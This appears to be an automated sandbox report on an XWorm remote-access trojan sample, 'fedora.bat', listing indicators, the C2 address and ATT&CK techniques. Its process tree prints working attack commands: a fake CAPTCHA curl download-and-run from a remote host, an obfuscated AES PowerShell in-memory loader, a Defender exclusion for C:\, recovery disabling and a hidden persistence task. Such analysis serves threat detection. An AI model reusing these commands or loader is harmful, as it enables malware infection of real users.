xworm | 3c482d9f9ba4f4a1ab37d3a0016763eaef87f5e51e259ee92d11e619026531c3

Analysis

max time kernel
65s
max time network
71s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
02/03/2025, 19:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fedora.bat
Size

115KB
MD5

a291659c73e487039ba0d4ed584d2335
SHA1

10b534a148cd151d32bf41fb8674acd5bc98493e
SHA256

3c482d9f9ba4f4a1ab37d3a0016763eaef87f5e51e259ee92d11e619026531c3
SHA512

797c0ab0dc2cf5a5f9012f1426f7766ff7ccf83c287b840254fb7b453d3a79b8cb6d59228cf6ec382cfc4ac6b069714f391efd57008b481a6d247f7da6d09c35
SSDEEP

3072:4YIEoF2PKuQNG88yD/HSkLhKAYzT6CN512EN2ENuN56E5NC6EEuQ6vgo:BIEUAKuL8jNFziT6CN512EN2ENuN56ES

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

45.154.98.138:5939

Mutex

iVJRN7HmpQeCP6EU

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/2764-69-0x0000022873190000-0x00000228731A0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
23	2764	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4220	powershell.exe
3568	powershell.exe
2764	powershell.exe
4960	powershell.exe
2652	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	reagentc.exe
File opened for modification	C:\Windows\system32\Recovery	reagentc.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133854191160930703"	chrome.exe

Modifies registry class 5 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4220	powershell.exe
4220	powershell.exe
4960	powershell.exe
3568	powershell.exe
4960	powershell.exe
3568	powershell.exe
2764	powershell.exe
2764	powershell.exe
2652	powershell.exe
2652	powershell.exe
2160	chrome.exe
2160	chrome.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeIncreaseQuotaPrivilege	3568	powershell.exe
Token: SeSecurityPrivilege	3568	powershell.exe
Token: SeTakeOwnershipPrivilege	3568	powershell.exe
Token: SeLoadDriverPrivilege	3568	powershell.exe
Token: SeSystemProfilePrivilege	3568	powershell.exe
Token: SeSystemtimePrivilege	3568	powershell.exe
Token: SeProfSingleProcessPrivilege	3568	powershell.exe
Token: SeIncBasePriorityPrivilege	3568	powershell.exe
Token: SeCreatePagefilePrivilege	3568	powershell.exe
Token: SeBackupPrivilege	3568	powershell.exe
Token: SeRestorePrivilege	3568	powershell.exe
Token: SeShutdownPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeSystemEnvironmentPrivilege	3568	powershell.exe
Token: SeRemoteShutdownPrivilege	3568	powershell.exe
Token: SeUndockPrivilege	3568	powershell.exe
Token: SeManageVolumePrivilege	3568	powershell.exe
Token: 33	3568	powershell.exe
Token: 34	3568	powershell.exe
Token: 35	3568	powershell.exe
Token: 36	3568	powershell.exe
Token: SeIncreaseQuotaPrivilege	3568	powershell.exe
Token: SeSecurityPrivilege	3568	powershell.exe
Token: SeTakeOwnershipPrivilege	3568	powershell.exe
Token: SeLoadDriverPrivilege	3568	powershell.exe
Token: SeSystemProfilePrivilege	3568	powershell.exe
Token: SeSystemtimePrivilege	3568	powershell.exe
Token: SeProfSingleProcessPrivilege	3568	powershell.exe
Token: SeIncBasePriorityPrivilege	3568	powershell.exe
Token: SeCreatePagefilePrivilege	3568	powershell.exe
Token: SeBackupPrivilege	3568	powershell.exe
Token: SeRestorePrivilege	3568	powershell.exe
Token: SeShutdownPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeSystemEnvironmentPrivilege	3568	powershell.exe
Token: SeRemoteShutdownPrivilege	3568	powershell.exe
Token: SeUndockPrivilege	3568	powershell.exe
Token: SeManageVolumePrivilege	3568	powershell.exe
Token: 33	3568	powershell.exe
Token: 34	3568	powershell.exe
Token: 35	3568	powershell.exe
Token: 36	3568	powershell.exe
Token: SeIncreaseQuotaPrivilege	3568	powershell.exe
Token: SeSecurityPrivilege	3568	powershell.exe
Token: SeTakeOwnershipPrivilege	3568	powershell.exe
Token: SeLoadDriverPrivilege	3568	powershell.exe
Token: SeSystemProfilePrivilege	3568	powershell.exe
Token: SeSystemtimePrivilege	3568	powershell.exe
Token: SeProfSingleProcessPrivilege	3568	powershell.exe
Token: SeIncBasePriorityPrivilege	3568	powershell.exe
Token: SeCreatePagefilePrivilege	3568	powershell.exe
Token: SeBackupPrivilege	3568	powershell.exe
Token: SeRestorePrivilege	3568	powershell.exe
Token: SeShutdownPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeSystemEnvironmentPrivilege	3568	powershell.exe
Token: SeRemoteShutdownPrivilege	3568	powershell.exe
Token: SeUndockPrivilege	3568	powershell.exe
Token: SeManageVolumePrivilege	3568	powershell.exe
Token: 33	3568	powershell.exe
Token: 34	3568	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2764	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1368 wrote to memory of 4220	1368	cmd.exe	78
PID 1368 wrote to memory of 4220	1368	cmd.exe	78
PID 4220 wrote to memory of 3020	4220	powershell.exe	79
PID 4220 wrote to memory of 3020	4220	powershell.exe	79
PID 4220 wrote to memory of 4960	4220	powershell.exe	81
PID 4220 wrote to memory of 4960	4220	powershell.exe	81
PID 4220 wrote to memory of 3568	4220	powershell.exe	83
PID 4220 wrote to memory of 3568	4220	powershell.exe	83
PID 4220 wrote to memory of 4068	4220	powershell.exe	86
PID 4220 wrote to memory of 4068	4220	powershell.exe	86
PID 4068 wrote to memory of 1792	4068	WScript.exe	87
PID 4068 wrote to memory of 1792	4068	WScript.exe	87
PID 1792 wrote to memory of 2764	1792	cmd.exe	89
PID 1792 wrote to memory of 2764	1792	cmd.exe	89
PID 2764 wrote to memory of 4396	2764	powershell.exe	90
PID 2764 wrote to memory of 4396	2764	powershell.exe	90
PID 2764 wrote to memory of 2652	2764	powershell.exe	92
PID 2764 wrote to memory of 2652	2764	powershell.exe	92
PID 2160 wrote to memory of 4732	2160	chrome.exe	97
PID 2160 wrote to memory of 4732	2160	chrome.exe	97
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 1632	2160	chrome.exe	98
PID 2160 wrote to memory of 684	2160	chrome.exe	99
PID 2160 wrote to memory of 684	2160	chrome.exe	99
PID 2160 wrote to memory of 5028	2160	chrome.exe	100
PID 2160 wrote to memory of 5028	2160	chrome.exe	100
PID 2160 wrote to memory of 5028	2160	chrome.exe	100
PID 2160 wrote to memory of 5028	2160	chrome.exe	100
PID 2160 wrote to memory of 5028	2160	chrome.exe	100
PID 2160 wrote to memory of 5028	2160	chrome.exe	100
PID 2160 wrote to memory of 5028	2160	chrome.exe	100
PID 2160 wrote to memory of 5028	2160	chrome.exe	100
PID 2160 wrote to memory of 5028	2160	chrome.exe	100
PID 2160 wrote to memory of 5028	2160	chrome.exe	100
PID 2160 wrote to memory of 5028	2160	chrome.exe	100
PID 2160 wrote to memory of 5028	2160	chrome.exe	100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\fedora.bat cmd /c curl.exe -k -Ss "https://onlyfans.ong/fodnvishvkshu/fedora.bat" -o "%USERPROFILE%\Zflare.bat" && start "" "%USERPROFILE%\Zflare.bat" By pressing OK you confirm you are not a robot.
1⤵
- Suspicious use of WriteProcessMemory
PID:1368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Temp\fedora.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('cmd /c curl.exe -k -Ss "https://onlyfans.ong/fodnvishvkshu/fedora.bat" -o "C:\Users\Admin\Zflare.bat"'));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4220
- - C:\Windows\SYSTEM32\reagentc.exe
    "reagentc.exe" /disable
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:3020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\zt4hqa3ldcd1.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3568
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\zt4hqa3ldcd1.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\zt4hqa3ldcd1.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Realtek-Hub\zt4hqa3ldcd1.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2764
      - C:\Windows\SYSTEM32\reagentc.exe
        
        "reagentc.exe" /disable
        6⤵
        Drops file in Windows directory
        
        PID:4396
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0x84,0x108,0x7ff9c406cc40,0x7ff9c406cc4c,0x7ff9c406cc58
  2⤵
  PID:4732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1812,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1808 /prefetch:2
  2⤵
  PID:1632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2132 /prefetch:3
  2⤵
  PID:684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2208 /prefetch:8
  2⤵
  PID:5028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:1
  2⤵
  PID:3548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:4300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3092,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4420 /prefetch:1
  2⤵
  PID:4452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4604,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4592 /prefetch:8
  2⤵
  PID:3920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4728 /prefetch:8
  2⤵
  PID:568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4728,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4884 /prefetch:8
  2⤵
  PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:8
  2⤵
  PID:980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4984 /prefetch:8
  2⤵
  PID:2776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4760,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4868 /prefetch:8
  2⤵
  PID:4056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5008,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4944 /prefetch:8
  2⤵
  PID:1204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4856,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4588 /prefetch:8
  2⤵
  PID:3680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5408,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5388 /prefetch:2
  2⤵
  PID:4980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5128,i,14887590316903589378,4857862548070623075,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5132 /prefetch:1
  2⤵
  PID:3436

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4680

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:1596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

